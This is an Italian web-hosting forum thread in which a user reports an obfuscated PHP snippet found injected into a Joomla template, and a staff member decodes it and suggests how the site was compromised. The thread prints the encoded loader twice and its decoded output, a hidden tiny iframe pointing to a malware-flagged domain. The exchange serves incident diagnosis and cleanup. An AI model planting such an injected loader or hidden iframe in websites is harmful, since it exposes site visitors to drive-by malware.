Visualizzazione risultati 1 fino 8 di 8

Discussione: codice aggiunto da solo

  1. #1
    Guest

    Predefinito codice aggiunto da solo

    come fa questo codice ad aggiungersi da solo?

    #c3284d#
    echo(gzinflate(base64_decode("3Y5BDoIwFET3JNyh+Rt0 Q6MLF0rxEl6gll/4Blvy+xG9vUVu4awmk7yZUeo/1CTHNImSz4QGBN+iH/ZltxTasuiim58YpF6YBHdVQ57tE1ViZ2AQmc5aM6Yphi7FmR2i 9+gk1RR81BRq19P1cAIVMmXgtpAIMqi8EMeRQm/AzhJB/WrvkTtkAyEHdqQ+GHB5fAUGpH4QA0dQC3UyrK5t9HanrfaXsmj 09rv9Ag==")));
    #/c3284d#

    l'ho trovato nella index.php del template di joomla e aggiungeva un iframe di twitter, io non l'ho messo, il punto è come ha fatto ad arrivare lì! me ne sono accorto perchè da due tre giorni il sito si vedeva male con ie ma bene con firefox e stasera ho letto il codice, cosa vedo? sta cosa che non si sa da dove è uscita...

  2. #2
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,759

    Predefinito

    Se ti interessa, quel codice scrive:
    Codice HTML:
    <script type="text/javascript">
    document.write('<iframe src="http://respondsourceeffects.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
    </script>
    Dove quella pagina, chrome me la segnala come malaware.
    Quindi l'ha messo qualche malintenzionato, molto probabilmente.

    Può averlo messo:

    1- sfruttando qualche bug di joomla: lo mantieni aggiornato?
    2-avendoti preso la password di altervista: controlla se c'é qualche malaware nel tuo PC.

    Ciao!

  3. #3
    Guest

    Predefinito

    esatto il codice è quello postato da te in html, l'ho rimosso dall'index.php nella forma che ho scritto sopra e adesso il sito è tornato normale, ho appena cambiato in via preventiva sia le password di joomla che quelle di altervista, joomla è l'ultima versione fornita da altervista, ho usato quella installabile da pannello.

    non ho malware nel pc dove tra l'altro c'è MS security essentials + firewall hardware cisco pix oltre al FW di windows percui ben protetto

    ma non c'è un antivirus o altro sul dominio?
    Ultima modifica di mivvsp : 11-07-2012 alle ore 23.13.11

  4. #4
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,759

    Predefinito

    Il dominio non riescono ad entrarci, altrimenti saremmo tutti nella tua stessa situazione.
    Se sei sicuro che nessuno conosce la tua password, e il pc non è infetto, allora hanno sfruttato qualche vulnerabilità di joomla... Lo mantieni aggiornato?

    Ciao!

  5. #5
    Guest

    Predefinito

    si ho già aggiornato tempo fa

    Versione di Joomla! Joomla! 2.5.6 Stable [ Ember ] 19-June-2012 14:00 GMT
    Versione piattaforma Joomla! Joomla Platform 11.4.0 Stable [ Brian Kernighan ] 03-Jan-2012 00:00 GMT

  6. #6
    Guest

    Predefinito

    ho fatto a inizio luglio due accessi da pc non mio ero a lavoro, qualcosa sarà sfuggito da lì probabilmente perchè qui è tutto a posto, tengo d'occhio i log per un po e vediamo, se scopro di più scrivo qui almeno lo sappiamo tutti

  7. #7
    Guest

    Predefinito

    Citazione Originalmente inviato da alemoppo Visualizza messaggio
    Il dominio non riescono ad entrarci, altrimenti saremmo tutti nella tua stessa situazione.
    Se sei sicuro che nessuno conosce la tua password, e il pc non è infetto, allora hanno sfruttato qualche vulnerabilità di joomla... Lo mantieni aggiornato?

    Ciao!
    scusi moderatore.. come fa a traduttre lo script dannoso ?
    purtroppo ho lo stesso problema

  8. #8
    L'avatar di alemoppo
    alemoppo non è connesso Staff AV
    Data registrazione
    24-08-2008
    Residenza
    PU / BO
    Messaggi
    22,759

    Predefinito

    Beh, è un sorgente PHP:

    Codice PHP:
    #c3284d#
    echo(gzinflate(base64_decode("3Y5BDoIwFET3JNyh+Rt0 Q6MLF0rxEl6gll/4Blvy+xG9vUVu4awmk7yZUeo/1CTHNImSz4QGBN+iH/ZltxTasuiim58YpF6YBHdVQ57tE1ViZ2AQmc5aM6Yphi7FmR2i 9+gk1RR81BRq19P1cAIVMmXgtpAIMqi8EMeRQm/AzhJB/WrvkTtkAyEHdqQ+GHB5fAUGpH4QA0dQC3UyrK5t9HanrfaXsmj 09rv9Ag==")));
    #/c3284d#
    È criptato, ma è php. Questo significa che è criptato lato server, ma guardando sul sorgente html (del browser, per intenderci) lo script non è più criptato, perché è stato interpretato (da php, in questo caso dalla gzinflate(), e dalla base64_decode()).

    Spero di essermi spiegato.

    Ciao!
    Ultima modifica di alemoppo : 17-07-2012 alle ore 14.25.08

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •